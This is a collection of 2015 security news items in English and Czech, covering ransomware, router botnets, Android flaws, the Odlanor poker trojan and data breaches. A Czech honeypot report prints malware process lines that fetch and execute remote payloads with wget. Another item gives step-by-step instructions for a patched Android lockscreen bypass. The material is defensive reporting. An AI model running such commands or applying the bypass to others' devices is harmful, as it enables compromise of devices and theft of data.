Continuing the process of diversification, in recent months there has been a significant increase in the use of ransomware targeting the Internet of Things (IoT). Various devices such as smart watches and TVs are susceptible to being affected by this type of malicious software, mainly those running the Android operating system.
Is this a threat that’s here to stay?

It is clear that the proliferation of ransomware is a growing trend, and one that is highly likely to keep on growing, not least because it is now possible to buy it as a service. Ransomware as a Service (RaaS) has been discovered to be available through a tool called Tox, which enables people to create this type of malware automatically, without requiring technical knowledge.
Similarly, with the recent revelation that the first open-source ransomware (Hidden Tear) has been published, a new window of opportunity has been opened for developing this malware ­– and variants of it – leading to predictions of increasingly sophisticated malware being developed and deployed on a massive scale.
The facts and figures lead us to believe that we are facing a threat that will continue to exist for years to come, due primarily to the unlawful but substantial profit it represents for its creators and the number of devices and users susceptible to being affected.
For this reason, the most important thing is to keep following good practices, using security solutions against malware, and above all to use common sense in order to avoid becoming a victim, or at least to ensure that the consequences of becoming infected are minimal. Despite everything, although the threat is complex, diverse, and widespread, the methods of distribution and infection have not changed greatly.

UK’s NCA calls for global approach to cybercrime

The UK’s National Crime Agency (NCA) is keen to work more closely with security organizations around the world to tackle the global threat of cybercrime.
Speaking recently at the CLOUDSEC London 2015 conference, Oliver Gower, head of strategy, partnerships and transformation at the NCA’s National Cyber Crime Unit, said that a joint-up approach is vital.
He explained that because of the international nature of the threat – and the fact that cybercriminals pay no attention to national boundaries – it is important that the security world comes together to combat a universal menace.
The Register reported that this collective strategy will help the NCA “reach across jurisdictions, and bust underworld gangs around the planet”.
Mr Gower said that this approach should take inspiration from the so-called Five Eyes partnership between the US’ National Security Agency, the UK’s Government Communications Headquarters, Canada’s Communications Security Establishment, Australia’s Australian Signals Directorate and New Zealand’s Government Communications Security Bureau.
The goal of this alliance, which emerged in the aftermath of the second world war, is to share information and intelligence on matters of security.
Mr Gower said that a collaborative approach from security professionals is necessary because managing trans-jurisdictional efforts to fight cybercrime is extremely difficult as it currently stands.
“Police investigators struggle to accept their technical limitations, and need the help of talented information security types to keep up with progress,” the online news provider reported.
“Deconfliction between different police forces is increasingly an issue for crime-busting coalitions, too.
“The possibility of undercover cybercops having their investigations blown by blue-on-blue bungling – an officer in one country interrupting and scuppering the work of another – is increasingly an issue.”
In related news, the NCA’s website was recently attacked, with the Lizard Squad claiming responsibility.
The denial-of-service attack was thought to be in response to the NCA’s recent spate of arrests relating to the illegal use of of tool known as the Lizard Stresser.
This is a paid-for online service that allows individuals to carry out attacks on websites, taking them offline for up to eight hours.

Nenechavý router botnet útočí na Ubiquiti airRouter

19.9.2015 Zranitelnosti

Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídá AirOS bežící na Ubiquiti airRouter. Po úspěšném přihlášení se do routeru instaluje malware.

Není to tak dlouho, co jsme na základě sledování útočníků v našich telnetových honeypotech odhalili zajímavý botnet složený z domácích routerů značky ASUS. Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris zase nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídají s cookie AIROS_SESSIONID.

Tato cookie ukazuje na AirOS bežící na Ubiquiti airRouter. Podle dat ze Shodanu lze touto cookie identifikovat asi 20 % útočících IP adres z celkových cca 6 500 jako AirOS. Mnoho adres ale bývá z dynamických poolů, o kterých Shodan ještě neví.

Botnet velmi rád používá na přihlašování kombinaci jména a hesla ubnt:ubnt (tuto kombinaci nemáme běžně povolenou na SSH honeypotu a neúspěšné pokusy o přihlášení se na webu neukazují). Je to výchozí kombinace právě pro airRouter a evidentně je stále dost kusů, které nemají výchozí nastavení změněno. Navíc SSH port je dostupný z internetu.

Jeden airRouter jsme si tedy koupili a sledovali, co se stane. Než se útočníci pokusili do routeru přihlásit, uplynulo jenom pár minut. Bylo to, jako vrátit se 10 let zpátky do doby, kdy byl rozšířený červ Sasser. V době jeho největší slávy byly Windows napadeny dříve, než se provedly aktualizace (obejít to šlo jen offline instalací a offline patchem).

Vzorek malware je vzhledem k jeho hlučnosti dost známý – jedná se o PNScan.2, který se botnet pokouší šířit dál. Krátce po instalaci začne napadání dalších strojů. Soubory se seznamem IP adres k útoku se vyznačují tím, že jsou „předscanovány“, tj. útočníci už vědí, že na cílových strojích běží SSH.

Při delším čekání přibudou procesy dalších trojanů postahované od PNScan, většina běžících procesů patří malware:

902 ubnt 812 R /usr/bin/
1005 ubnt 272 S /usr
1209 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1210 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1211 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1212 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1213 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1236 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1239 ubnt 3564 S ./wras
1240 ubnt 3564 S ./wras
1241 ubnt 3564 S ./wras
1248 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
1251 ubnt 3564 S ./hsde
1252 ubnt 3564 S ./hsde
1253 ubnt 3564 S ./hsde
1292 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1295 ubnt 3564 S ./wras
1296 ubnt 3564 S ./wras
1297 ubnt 3564 S ./wras
1302 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
1305 ubnt 3564 S ./hsde
1306 ubnt 3564 S ./hsde
1307 ubnt 3564 S ./hsde
1368 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1371 ubnt 3564 S ./wras
1372 ubnt 3564 S ./wras
1373 ubnt 3564 S ./wras
1427 ubnt 816 S /usr/bin/
Méně obvyklé procesy trojanů zobrazované jako „ /usr “ a „ /usr/bin “ patří trojanu Tsunami. Toto skrývání se dělá obyčejnou změnou argv[0] a je zarážející, proč si útočník nevybral změnu o něco méně nápadnou. Závěr ale není příliš překvapivý: zranitelné zařízení moc dlouho netknuté na internetu nevydrží.

Pokud tedy tento router vlastníte, zkuste se podívat, co všechno na něm běží za procesy. A pokud si ho hodláte pořídit, doporučujeme ho nejprve nastavit bez připojení do internetu, nastavit silné heslo a pokud ho opravdu nepotřebujete, vypnout SSH server pro spojení z internetu.

D-Link omylem zveřejnil privátní klíče, hackerům usnadnil práci

19.9.2015 Zranitelnosti
D-Link omylem zveřejnil privátní klíče, hackerům usnadnil práciDnes, Milan Šurkala, aktualitaSpolečnost D-Link se dopustila velké bezpečnostní chyby. Ve svém firmwaru ponechala i mnoho svých privátních klíčů, díky čemuž hackeři mohli vytvořit firmware s malwarem a bez problémů si jej digitálně podepsat.
Společnost D-Link poskytuje i open source firmwary ke svým zařízením, nicméně v poskytnutých balíčcích k bezpečnostní kameře D-Link DCS-5020L se omylem vyskytly i privátní klíče a hesla. To znamená, že útočník mohl vytvořit firmware obsahující škodlivý kód a bez větších problémů mohl takto závadný firmware nechat digitálně podepsat, aby se tvářil jako legitimní software od D-Linku.
Problém se týkal jen jednoho balíčku, neboť starší i novější verze už tyto klíče neobsahovaly. Původní certifikáty byly vytvořeny 27. února, takže chybu mohli útočníci využít už před půl rokem. Platnost všech omylem zveřejněných certifikátů vypršela nejpozději 3. září. Zatím se neví, zda někdo uvolněných klíčů D-Linku využil k nekalé činnosti. Připomeňme, že metoda využití kradených certifikátů k podpisu malwaru je docela oblíbená a především účinná. Takto bylo hacknuto např. Sony Pictures Entertainment.

Porno aplikace si tajně fotila uživatele a pak je vydírala

19.9.2015 Mobil

Zscaler objevil aplikaci pro Android, která slíbila porno. Místo toho si vyfotila uživatele a pak chtěla výkupné.
Adult Player pod příslibem nějakého toho pornografického potěšení nalákal uživatele k instalaci do zařízení s Androidem a poté si pořizoval jejich fotografie (prostřednictvím přední kamery). Aplikace následně uzamkla mobil a dožadovala se 500 dolarů.

Jde v zásadě o klasický příklad ransomwaru, jak je tato odnož malwaru/virů označována – nejdřív vám zařízení zamkne a pak požaduje výkupné za jeho odemčení či dešifrování. Vydaračské aplikace fungují na klasických počítačích i mobilech a umí být velmi různě vynalézavé. Dost často vyžadují platby v bitcoinech.

Adult Player jste si samozřejmě nemohli opatřit v oficiálním Google Play, bylo nutné povolit na telefonu instalaci z dalších zdrojů a Adult Player si pořídit někde jinde – stáhnout jako APK z internetu (může přijít i e-mailem) nebo jej najít v záplavě podloudných a podvodných obchodů s aplikacemi.

Zbavit se něčeho takového je zpravidla možné pomocí restartu do Nouzového režimu (Safe Mode), kdy se telefon spustí bez do něj nainstalovaných aplikací a tu škodlivou je zpravidla možné odstranit. Nemusí to být ale 100% účinné, některé z těch „lepších“ škodlivých aplikací se umí dobře bránit.

V More Adult Themed Android Ransomware se případně můžete dozvědět ještě další detaily, včetně neaktivního odkazu.

Adult Player se v zásadě tváří jako přehrávač pornovideí a je klasicky založený na tom, že mu uživatelé přidělí práva správy telefonu – ty požaduje hned při prvním spuštění. Což by mělo stačit k tomu, aby uživatel něco takového odmítl – bohužel tady funguje starý známý fakt, že lidé obvykle slepě klikají na OK (v tomto případě Aktivovat).

Po spuštění a napadení telefonu nakonec zařízení uzamkne a zobrazí klasickou informací o tom, že po vás jde FBI a vyžádá si platbu. Případný restart telefonu blokující obrazovku neodstraní.

Může AVG prodávat historii našich prohlížečů?

18.9.2015 Sledování
Může AVG prodávat historii našich prohlížečů?Dnes, Jan Vítek, aktualitaSpolečnost AVG je známým výrobcem antivirů, jejíž řešení pomáhá dle informací z firemních stránek chránit počítače 200 milionů aktivních uživatelů. Nyní se ale řeší ustanovení ze smlouvy, dle nějž prý AVG může prodávat historii prohlížečů třetím stranám.
Zprávu přinesl server Computing, jehož redaktor zkoumal ustanovení řešící soukromí a osobní data uživatelů AVG. Řada z nich spoléhá na volně dostupnou verzi antiviru AVG, který je jinak velice oblíbený a pravidělně získává i pozitivní hodnocení v různých testech a recenzích. Nová ustanovení mají vstoupit v platnost 15. října a dle zdroje umožní "sběr a prodej osobních informací vztahujících se k historii prohlížečů, vyhledávání, pozice (GPS) a metadat". Dříve se přitom psalo jen o sběru dat týkajících se aplikací a stránek AVG a také škodlivého softwaru, který antivir na počítači najde.

Computing má problém konkrétně s částí ustanovení "What do you collect that cannot identify me?". Píše se tam o sběru dat, která jsou ale označena za non-personal, čili neosobní, která nás nemohou identifikovat. Taková data bude moci prodávat třetím stranám, a to včetně:
reklamního ID spojeného s našim zařízením
historie prohlížeče včetně vyhledávání a metadat
informací i poskytovateli internetového připojení
informací o dalších nainstalovaných aplikací a způsobu jejich využití

AVG se také zavazuje k tomu, že data z prohlížeče, která by nás mohla identifikovat, se ven nedostanou. V jiné části ustanovení ale AVG píše, že bude sdílet i "jistá osobní data", a to se svými sesterskými společnostmi, provozovateli vyhledávacích služeb a vybranými distributory a jinými partnery. Alexander Hanff tyto podmínky považuje za naprosto nepřijatelné, neboť mají platit pro software, jenž má v systému rozsáhlá práva, neboť jeho starostí je ochrana před malwarem. A je tu otázka, zda jsou nová ustanovení vůbec v souladu s novou legislativou EU o ochraně osobních údajů jako GDPR (General Data Protection Regulation).

Společnost AVG se již k této věci stačila vyjádřit na svém blogu, kde zveřejnila jakýsi návod, jak máme rozumět novým ustanovením o osobních údajích a bezpečnosti. Zveřejnila je prý s měsíčním předstihem proto, aby získala zpětnou vazbu od uživatelů a uvedla, že ti si budou moci vybrat, zda budou či nebudou chtít sdílet svá data, a to anonymně. Tato možnost bude nabízena také u některých volně využitelných produktů AVG, ale to může znamenat, že u jiných může být sdílení dat povinné. AVG nakonec sděluje, že neprodává a ani nikomu nebude prodávat jakákoliv osobní data, jež se budou vztahovat přímo k naší osobě.

Děravé Androidy: telefony na záplaty čekají dlouhé měsíce

18.9.2015 Mobil

Ví se o tom dlouho, ale všichni víceméně dělají, jako by to neexistovalo. Bezpečnost Androidu není ani zdaleka ideální. Může za to pozdní opravování bezpečnostních chyb výrobci, potažmo absence systému, který by snadné doručování záplat umožnil. A tak se po světě potulují stamilióny zranitelných Androidů.

Za největší problém Androidu bývá často označována roztříštěnost, tedy existence mnoha různých verzí. Tu se postupně daří eliminovat, zejména proto, že základní koncept systému už se ustálil a nové verze se od sebe tolik neodlišují. Pak je tu ještě ten problém, že výrobci s vydáním nové verze Androidu otálejí mnoho měsíců. A s tím se pojí problém ještě mnohem závažnější – mnoho měsíců musí uživatelé čekat i na bezpečnostní záplaty.

Pokud nemáte zařízení z řady Nexus, případně neprovozujete jednu z hodně aktuálních alternativních ROM, je velmi pravděpodobné, že je váš telefon zranitelný vůči několika velmi závažným chybám. Připomeňme, že počet aktivních zařízení s Androidem se odhaduje na cca 2–3 miliardy. Android tak skýtá větší bezpečnostní riziko, než např. pravidelně aktualizované desktopové systémy, o kterých se v této souvislosti hovoří častěji.

Současný stav: měsíce čekání

Většina výrobců bezpečnostní aktualizace v současnosti vůbec neřeší. Resp. sbírá je, ale chyby záplatuje až se standardním povýšením systému na novou verzi. To v případě nových a populárních zařízení přichází přibližně třikrát do roka. Pokud ale máte jeden z méně rozšířených telefonů, může se stát, že aktualizaci dostanete sotva jednou za rok. V obou případech se jedná o nedostačující interval, který telefony a tablety nechává několik měsíců na ráně.

Nutno konstatovat, že ani Google problému dlouho nepřikládal dostatečnou pozornost. Sice už nějakou dobu vydává pravidelné bezpečnostní zprávy, ve kterých výrobce upozorňuje na vážnější chyby, ale jinak na výrobce nijak netlačí, přestože možnost by tu byla. Pokud výrobci chtějí požehnání, logo a aplikace služby Googlu, musí splnit jeho podmínky. Ty v současnosti o bezpečnostních aktualizacích neříkají vůbec nic. A když není tlak se strany Googlu ani uživatelů, výrobci k aktualizacím přistupují velmi nedbale.

Google půjde příkladem

Už i Google si ale začal uvědomovat, že je situace vážná. Koneckonců, děravé Androidy nejsou špatná reklama jen pro výrobce, ale i pro něj. Zatím ale Google zvolil pouze to nejmírnější opatření: půjde příkladem. Každý měsíc vydá balíček bezpečnostních oprav založený na bezpečnostní zprávě, kterou už stejně sestavuje. Aktualizace dorazí standardně over-the-air (OTA). Uživatelé podporovaných zařízení Nexus (Nexus 4 a novější) už obdrželi dva balíčky.

Google už tímto krokem sklidil aspoň částečný úspěch, jelikož se ho rozhodla následovat dvojice velkých výrobců: Samsung a LG. Formát by měl být stejný – měsíční. Zatím ale není zřejmé, kdy se uživatelé dočkají prvních aktualizací, ani na která všechna zařízení dojde. Vedlejším produktem vydávání aktualizací by tak mohlo být stanovení doby podpory pro každý smartphone. To je v současnosti výjimka, žádný plán neexistuje a výrobce jen jednoho dne řekne: nový Android nedostanete.

Jisté uznání si zaslouží i Motorola, která sice pravidelné aktualizace zatím nepřislíbila, ale aspoň vydala mimořádnou aktualizaci opravující StageFright, nejzávažnější chybu v Androidu za poslední dobu. Stejně tak učinil Samsung u nejvyšších modelů. Nesmíme se ale nechat uchlácholit opravením jedné, byť opravdu velké chyby. Závažných chyb se v Androidu každý rok nalezne řada. Bez změny celé politiky aktualizací se situace nezlepší.

TIP: Otestujete zranitelnost svého zařízení na StageFright pomocí speciální aplikace.

Android potřebuje lepší systém aktualizací

Problém ale nepředstavuje pouze ochota výrobců záplatovat, ale i samotný systém aktualizací, který je poměrně nepřívětivý. Vyžaduje restart zařízení a obvykle i dlouhé čekání, při kterém Android optimalizuje aplikace. V závislosti na množství instalovaných aplikací, rychlosti úložiště a výpočetním výkonu se tento proces může protáhnout až na půl hodiny, během které navíc telefonu velmi rychle dochází šťáva.

Co že ona mysteriózní optimalizace znamená? Android jednoduše kompiluje nainstalované aplikace, aby jejich spouštění bylo co nejrychlejší. Opětovná kompilace je v současnosti nutná i při malých změnách systému. Ta mimochodem souvisí se zavedením běhového prostředí ART, které bylo volitelné v Androidu 4.4 a povinné v Androidu 5.0 Lollipop. Do té doby se o aplikace staral Dalvik, který je kompiloval vždy až při spuštění.

Chtít po uživateli, aby jedenkrát za měsíc vyhradil zařízení půlhodinu na aktualizaci, je poměrně velký požadavek. Zvlášť když desktopové systémy, nové Windows 10 zejména, už aktualizace instalují na pozadí téměř bez vědomí a povšimnutí uživatele. Samozřejmě, aktualizace linuxového jádra jsou jedna – relativně složitá – věc, ale aktualizace menších a relativně oddělených součástí systému by mohla být snazší. Dnešní architektura Androidu bohužel moc možností nedává.

Změna je nevyhnutelná

Rychlejší systém aktualizací je ale až druhořadá záležitost. Hlavní je, aby výrobci skutečně aktualizace začali vydávat pravidelně. Bezpečnost mobilních zařízení opravdu není radno podceňovat. Možná si to ani neuvědomuje, ale chytré telefony a tablety se během několika posledních let staly zařízeními, která leckdy mají největší přístup k osobním datům uživatelů. Mnohdy větší, než osobní počítače.

Pokud to nepůjde po dobrém, měl by to Google zkusit po zlém. Tedy úpravou podmínek pro použití jeho služeb danými výrobci. Google je poměrně znám tím, že dbá na bezpečnost a chyby se snaží rychle opravovat. Jeho bug bounty programy, kde nabízí nálezcům chyb pěkné odměny, jsou koneckonců jedny z nejúspěšnějších vůbec. Pokud se po světě potuluje tolik děravých zařízení s logem Googlu, celkem to kazí jeho reputaci. Doufejme, že budoucnost Androidu bude růžová. A podstatně bezpečnější.

How to hide from surveillance cameras: the past and the future

Surveillance cameras are everywhere today: outdoors and indoors, at airports, railroad stations, offices, and shops. You cannot escape the all-seeing eye of the cameras even in the wild, making George Orwell’s refined imagination blanch in the face of reality.

Kaspersky Lab tells how to hide from surveillance cameras

For most monitoring systems, video is recorded in cycles “just in case;” and does not go anywhere further. Lately it has become more frequent that this video is sent to various data analysis systems, therefore, it could be used to track some specific people.

It goes without saying that Big Brother may violate our private lives. You can accept that evil from the government, as these people are here as if to maintain order. Yet today, biometric systems attempt to use common businesses that act against our pockets and our right for private life. And this is a horse of a different color.

For example, you are shopping for a winter coat. At the same time, the surveillance system of the store checks you with the pictures of known robbers and adds one more record into your buyer profile.

Alternatively, you go to a car dealer in order to take a look at new cars. Immediately upon your entrance, he finds out your name and all there is to know about you. Including the fact that you cannot afford a new car.

There is no salvation even inside churches. Facial recognition systems are already used to discover regular church-goers: it turns out that it is more promising to solicit donations from them.

Isn’t it nice? Not so much, but there is nothing criminal about this.

What will you say if every detail of your private life, collected by different companies, comes to light one day on the Internet? Unlike it has been with the story about hacking the Ashley Madison site, there will be no doubt that it is you — here are your relevant pictures and videos.

The laws of most countries still do not truly suppress the usage of facial recognition for commercial purposes, just as it is not forbidden, for example, to take pictures of people in the streets. It does not come as a surprise that more and more people are wondering how to hide from the all-seeing eye in these conditions.

To understand how it can be done better, a couple of words should be told about contemporary image analysis methods. Under certain conditions, it is possible to highlight two common approaches.

May I see your face please
The first, approach is based on comparison of some markers that are assignable in a picture and a prebuilt database. The markers can be the distance between the eyes, the nose measurement results, lip shape evaluations, and such.

This approach is similar to identifying a person by his fingerprints. The sample fingerprints should be taken beforehand and saved into a database. After this, we compare to what extent the papillary lines of an unknown person match one of the samples. Therefore, the prerequisite for facial recognition is adequate-quality pictures (full-face and with good even lighting) of the right people.

Where can these pictures be obtained? The sources can be different. Maybe we’ll be required to look into the camera when creating a discount card, or maybe someone will scan some documents with your picture.

It is relatively easy to cheat the classic facial recognition system. The easiest way is to lower your head and not look into the camera. Most markers can be measured only from a certain full-face angle so that the picture at an angle will not provide the required data, most likely. If you wear a peaked baseball cap upon your head, then the cameras located above (they are usually installed somewhere high enough) become totally useless.

Some experts advise to make faces when you pass by a lens. Maybe it works quite well, but it attracts too much attention. A pair of dark glasses is what you need.

The advantage of sunglasses is in covering the eyes, which is one of the most useful areas on one’s face for recognition systems. Common transparent dioptric glasses do not distort the required details of a picture well, and advanced algorithms can cope with that quite easily. However, large opaque glasses are a serious challenge for the classic systems. So are mirror models that blind the camera with the reflected light.

And the way you look tonight…
The second approach to human recognition that is actively developed by, for example, Facebook and Google, works in a different way. It is based on machine learning algorithms and automatic sample data download and upload to compare it with all of the available online sources.

This is a much more flexible thing that is much harder to trick. Even a gas-mask covering your face does not guarantee remaining incognito, as similar systems do not require strictly preset markers.

They can use any available data for recognition: the shape of your leg or your bald patch, your tattoo, your bearing, your clothes, etc. An experimental development by Facebook can identify a person from any angle with 83% accuracy with a sufficient number of sample pictures.

The key point here is a sufficient number of pictures for the comparison. If there, at the other end, is only one image of you, even a high-quality one, then the possibility of successful recognition plummets. This is why Big Data technologies and fast Internet search algorithms are brought to the forefront.

How to hide from #surveillance cameras: the past and the future
Here comes the sore point: should we openly publish pictures of ourselves online? We can stand the fact that Facebook or Google uses them for their own marketing goals, as you cannot hide from these “Big Internet Brothers” anywhere at all. Yet, nothing stops any company from digging up the required data online if they are in free access.

Let’s assume that your Facebook page is closed with the “Friends Only” privacy setting. What about random pictures of you in different posts of other people? What about your profile on LinkedIn? It is very hard to cut off all of the sources even by complete social network abstinence.

The solution to this is yet unclear. Likely, it can be a more strict regulation of the biometrics market from the government side and a more conscious attitude from society.

So, it is time to get used to the thought that our personal pictures are almost the same private thing as our document or credit card scans. Flaunting and flashing them everywhere is absolutely not recommended.

Researchers make easy work of Android lockscreen security

Security features on Android smartphones can easily be bypassed by cybercriminals, even if the device is protected by encryption, it has been revealed.
Researchers from the University of Texas at Austin discovered that as a result of the vulnerability in Android 5.x (CVE-2015-3860), attackers can circumvent Android lockscreen security and take control of the smartphone.
“By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen,” the team reported in an official blog.
“At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein.”
There are two criteria for a successful attack to be launched. One, the cybercriminal must have physical access to the device and two, the original user must have a password set.
The process of bypassing security
From the locked screen, the attacker will open the emergency call window, “type a few characters”, double-tap to highlight the text and then copy.
“[The cybercriminal will] then tap once into the field and tap paste, doubling the characters in the field,” the researchers elaborated.
This process is then repeated until the attacker can no longer highlight the field with the double-tap (approximately 11 repetitions).
From this point, the cybercriminal will return to the lockscreen and then access the camera, which is possible without having full access to the smartphone.
The next step is to then swipe down to bring up the notification page, press the settings icon and then, in response to the password prompt, to long-tap into the field.
As with before, the process of repetitions begins again, with the attacker persisting with pasting the characters as many times as the device will allow.
This comes to a halt when the user interface crashes and the “soft buttons of the screen disappear”. The camera will then expand to fullscreen and the attacker will wait until this function crashes (a degree of patience is required).
The attacker can then “navigate to the settings application by any means possible” and, “at this point, it is possible to enable USB debugging normally and access the device via the adb tool to issue arbitrary commands”.
The vulnerability has been resolved
The security flaw was reported by the university to the Android security team towards the end of June. In August, it committed a patch to resolve the issue and on September 9th, announced that the 5.1.1 build LMY48M had fixed the issue.
In the announcement, Google stated that it had not observed any malicious activity of the kind highlighted by the University of Texas at Austin.
Aggressive Android ransomware spreading in the US
In related news, ESET recently reported that it had found the “first known Android lock-screen-type ransomware spreading in the wild that sets the phone’s PIN lock”.
Lukas Stefanko, a malware researcher at ESET, noted that this development is significant and that “malware writers have stepped up their game”.
He explained: “With the new Android ransom-lockers … users have no effective way of regaining access to their device without root privileges or without some other form of security management solution installed, apart from a factory reset that would also delete all their data.”

The Trojan Games: Odlanor malware cheats at poker

Whenever ESET malware researchers discover a new interesting attack, a new piece of malware, or an old threat evolving in an interesting way, we share the news on this blog. Every once in a while, though, we stumble upon something that stands out, something that doesn’t fall into the “common” malware categories that we encounter every day – such as ransomware, banking trojans, or targeted attacks (APTs) – just to name a few of those that are currently causing the most problems. Today, we’re bringing you one of those uncommon threats – a trojan devised to target players of online poker.
The last time I wrote about poker-related malware, it was about PokerAgent, a trojan propagating through Facebook that was used to steal Facebook users’ logon credentials, credit card information and the level of Zynga poker credit.
Today, we’re bringing you news about Win32/Spy.Odlanor, which is used by its malware operator to cheat in online poker by peeking at the cards of infected opponents. It specifically targets two of the largest online poker sites: PokerStars and Full Tilt Poker.
Modus operandi: Malware takes screenshots of the infected opponent

The attacker seems to operate in a simple manner: After the victim has successfully been infected with the trojan, the perpetrator will attempt to join the table where the victim is playing, thereby having an unfair advantage by being able to see the cards in their hand.
Let’s explain each of those steps in a bit more detail, as uncovered through our analysis.
Like a typical computer trojan, users usually get infected with Win32/Spy.Odlanor unknowingly when downloading some other, useful application from sources different than the official websites of the software authors. This malware masquerades as benign installers for various general purpose programs, such as Daemon Tools or mTorrent. In other cases, it was loaded onto the victim’s system through various poker-related programs – poker player databases, poker calculators, and so on – such as Tournament Shark, Poker Calculator Pro, Smart Buddy, Poker Office, and others.
Once executed, the Odlanor malware will be used to create screenshots of the window of the two targeted poker clients – PokerStars or Full Tilt Poker, if the victim is running either of them. The screenshots are then sent to the attacker’s remote computer.
Afterwards, the screenshots can be retrieved by the cheating attacker. They reveal not only the hands of the infected opponent but also the player ID. Both of the targeted poker sites allow searching for players by their player IDs, hence the attacker can easily connect to the tables on which they’re playing.
We are unsure whether the perpetrator plays the games manually or in some automated way.
In newer versions of the malware, general-purpose data-stealing functionality was added by running a version of NirSoft WebBrowserPassView, embedded in the Oldanor trojan. This tool, detected by ESET as Win32/PSWTool.WebBrowserPassView.B, is a legitimate, albeit potentially unsafe application, capable of extracting passwords from various web browsers.
Communication with its C&C via HTTP

The trojan communicates with its C&C, the address of which is hardcoded in the binary, via HTTP. Part of the exfiltrated information, such as the malware version and information identifying the computer, are sent in the URL parameters. The rest of the collected information, including an archive with any screenshots or stolen passwords, is sent in the POST request data.
The screenshots from IDA Pro below show the parts of the malware code that search for PokerStars and Full Tilt Poker windows:

Screen Shot 2015-09-16 at 12.28.56

We have observed several versions of the malware in the wild, the earliest ones from March 2015. According to ESET LiveGrid® telemetry, the largest number of detections comes from Eastern European countries. Nevertheless, the trojan poses a potential threat to any player of online poker. Several of the victims were located in the Czech Republic, Poland and Hungary. As of September 16th, there have been several hundred users infected with Win32/Spy.Odlanor:odlanor_poker_cheating
SHA1 hashes



iOS AirDrop vulnerability allows for malware installation on Apple devices

In addition to the usual benefits that come with an updated operating system – new enhancements that make your device easier to use – there are other, less visible advantages to downloading the latest software.
Security is one of these, and, as Apple launches iOS 9, this understated benefit has been highlighted by an expert who has come across a flaw.
Mark Dowd, director and founder of Azimuth Security, explained to Forbes that any iOS device that supports the AirDrop feature is vulnerable to a certain type of cyberattack.
This applies to all of Apple’s most recent products (from iOS 7), including Macs, iPhones and iPads, Mr Dowd noted.
He showed that via AirDrop – which allows individuals to share photos, videos, websites and locations with other Apple devices – an attacker can install malware on a victim’s smartphone or tablet.
This is achieved through a directory traversal attack, which basically gives a cybercriminal access to certain parts of an operating system that are usually off-limits.
Once in, the attacker can then change configuration files, meaning that the breached device can now install malicious apps that otherwise appear to have been authenticated by Apple’s Developer Enterprise Program.
“To make the iPhone accept his certificate, Mr Dowd’s AirDrop attack forced an installation of a provisioning profile for his app,” the online news provider detailed.
“He then altered Springboard, Apple’s tool for managing the iOS home screen, to trick the phone into believing his ’enterprise’ was already accepted as trusted by the user when it shouldn’t have been.
“He then copied his malware files into the directory where third-party apps were located.”
Mr Dowd has advised users to upgrade their Apple devices immediately to avoid falling victim to this attack.
Last week, at Apple’s Keynote event in San Francisco, it was revealed that iOS 9 comes with additional security features.
There are two notable developments – a stronger passcode and a revamped two-factor authentication process (2FA).
By “by building [2FA] it directly into iOS, it [is] harder for others to gain unauthorized access to your Apple ID,” the tech giant stated at the time.

Second Russian pleads guilty in record US data breach

A second Russian man has pleaded guilty in an American court for his role in what is thought to be the biggest data breach in the history of the US.
A day after 34-year-old Vladimir Drinkman pleaded guilty in New Jersey for helping orchestrate the theft of 160 million credit card details, Dmitriy Smilianets, 32, admitted his involvement in the cyberattack.
The two men, along with three others, were originally indicted in 2013 and charged with “spearheading a worldwide hacking conspiracy that victimized a wide array of consumers and entities, causing hundreds of millions of dollars in losses”.
Mr Drinkman and Mr Smilianets were first apprehended in the Netherlands three years ago. The latter was extradited to the US at the time, while the former had been in the custody of Dutch authorities until February of this year.
The other three suspects in this landmark case, Alexandr Kalinin, 28; Roman Kotov, 34; and Mikhail Rytikov, 28, remain at large.
Prosecutors argue that all five suspects “conspired with others” to breach computer networks belonging to payment processing companies, retailers and financial institutions – including Nasdaq, 7-Eleven, Carrefour, JCP, Hannaford and Ingenicard.
“The initial entry was often gained using a SQL (structured query language),” the Department of Justice explained earlier this year.
“The hackers identified vulnerabilities in SQL databases and used those vulnerabilities to infiltrate a computer network.”
Once in, the defendants were able circulate malware throughout the system, creating a hidden “backdoor” that allowed them to maintain ongoing access to the network.
After they had acquired credit card data – and valuable information connected to it – they went on to sell the information to individuals and organizations throughout the world.
It is alleged that for every American credit card number and associated data, the group made a $10 profit; for Canadian counterparts, it was $15; and for European alternatives, it was $50.
“This hacking ring’s widespread attacks on American companies caused serious harm and more than $300 million in losses to people and businesses in the United States,” commented Leslie R. Caldwell, assistant attorney general for the criminal division of the Department of Justice.
“As demonstrated by today’s conviction, our close cooperation with our international partners makes it more likely every day that we will find and bring to justice cybercriminals who attack America – wherever in the world they may be.”

New Bug in Bugzilla Software Could Expose Zero-Day Vulnerabilities

A Critical vulnerability discovered in Mozilla's popular Bugzilla bug-tracking software, used by hundreds of thousands of prominent software organizations, could potentially expose details of their non-public security vulnerabilities to the Hackers.
So it’s time for developers and organizations that use Bugzilla open source bug tracking system to upgrade to the latest patched versions – namely 5.0.1, 4.4.10, or 4.2.15.
Bugzilla is a vulnerability database used by Mozilla as well as many open-source projects and private organizations. Besides patched flaws, these databases also contain sensitive information related to unpatched vulnerabilities reported to organizations.
Unfortunately, the researchers at security firm PerimeterX have discovered a vulnerability (CVE-2015-4499) in Bugzilla's email-based permissions process that allowed them to gain high-level permissions on Bugzilla.
As a result, it is potentially possible for an attacker to easily access unpatched bugs in your database, which could then be exploited to attack affected pieces of software on people's computers before security patches are released.
